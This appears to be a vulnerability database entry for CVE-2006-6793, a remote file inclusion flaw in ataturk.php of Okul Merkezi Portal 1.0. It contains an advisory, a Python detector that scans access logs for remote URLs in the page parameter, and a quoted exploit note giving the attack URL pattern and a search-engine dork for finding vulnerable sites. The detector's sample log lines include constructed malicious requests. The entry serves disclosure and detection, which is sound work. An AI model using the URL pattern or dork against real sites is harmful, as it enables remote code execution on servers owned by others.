Okul Merkezi Portal 'ataturk.php' Remote File Inclusion Vulnerability

Vulnerability ID: 1111855    Vulnerability type: Input validation
Published: 2006-12-25    Updated: 2007-01-02
CVE ID: CVE-2006-6793    CNNVD-ID: CNNVD-200612-572
Platform: PHP    CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/3012
https://cxsecurity.com/issue/WLB-2006120137
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-572
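|Vulnerability details
A PHP remote file inclusion vulnerability exists in ataturk.php in Okul Merkezi Portal 1.0. Remote attackers can execute arbitrary PHP code via a URL in the page parameter.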
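
For detection, the following added example (not part of the advisory or of the product's code) scans web server access logs for requests to ataturk.php whose page parameter carries a URL or stream-wrapper scheme instead of a local page name. The combined log format, the /portal/ path, the page name "hayati", the hostnames and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# A leading scheme (http://, ftp://, php://, data: ...) or a protocol-relative
# "//host" means the parameter names a remote or wrapper resource.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.-]*:(?://)?|//)', re.IGNORECASE)

def suspicious_page_values(log_line, script="ataturk.php", param="page"):
    """Return the decoded `page` values in this log line that point off-host."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    if not parts.path.lower().endswith("/" + script):
        return []
    # parse_qs percent-decodes once, which matches what PHP sees in $_GET.
    values = parse_qs(parts.query, keep_blank_values=True).get(param, [])
    return [v for v in values if REMOTE_RE.match(v)]

def scan(lines):
    """Map line index -> flagged values for every line that matched."""
    hits = {}
    for i, line in enumerate(lines):
        found = suspicious_page_values(line)
        if found:
            hits[i] = found
    return hits

# Constructed sample log lines (documentation addresses and hostnames).
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Dec/2006:10:00:01 +0000] '
    '"GET /portal/ataturk.php?page=hayati HTTP/1.1" 200 5120',
    '198.51.100.7 - - [25/Dec/2006:10:02:13 +0000] '
    '"GET /portal/ataturk.php?page=http://files.example.net/x.txt HTTP/1.1" 200 312',
    '198.51.100.7 - - [25/Dec/2006:10:02:20 +0000] '
    '"GET /portal/ataturk.php?page=hTTp%3A%2F%2Ffiles.example.net%2Fx.txt HTTP/1.1" 200 312',
    '192.0.2.44 - - [25/Dec/2006:10:05:00 +0000] '
    '"GET /portal/index.php?page=http://files.example.net/x.txt HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    for idx, vals in scan(SAMPLE_LOG).items():
        print(f"line {idx}: page={vals}")
```

Only the second and third sample lines are flagged: the first carries a plain page name and the fourth targets a different script.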
|Exploit (EXP)
# LiderHack.Org & BhhGroup.Org & Bilgi-Yonetimi.Org.Tr

# script name : Okul Merkezi Portal v1.0

# GoogLe Dork : ogrencimezunlar.php

# Script Download : http://www.okulmerkezi.com/omdemo/

# Risk : High

# Found By : ShaFuck31

# Thanks : | Dekolax | The RéD | DesquneR | f1r3b0y | BaZaL | SaboTaqe | ST@ReXT | BLaSTER | UNiKnoX |

# Vulnerable file : ataturk.php

#Vuln :
http://www.victim.com/ScriptPath/ataturk.php?page=[sheLL]

#Contact: ShaFuq31 (at) HoTMaiL (dot) CoM [email concealed]

# milw0rm.com [2006-12-25]
|References

Source: BID
Name: 21730
Link: http://www.securityfocus.com/bid/21730
Source: BUGTRAQ
Name: 20061224 Okul Merkezi Portal v1.0 Remote File IncLude Vuln.
Link: http://www.securityfocus.com/archive/1/archive/1/455259/100/0/threaded
Source: VUPEN
Name: ADV-2006-5189
Link: http://www.frsirt.com/english/advisories/2006/5189
Source: SREASON
Name: 2069
Link: http://securityreason.com/securityalert/2069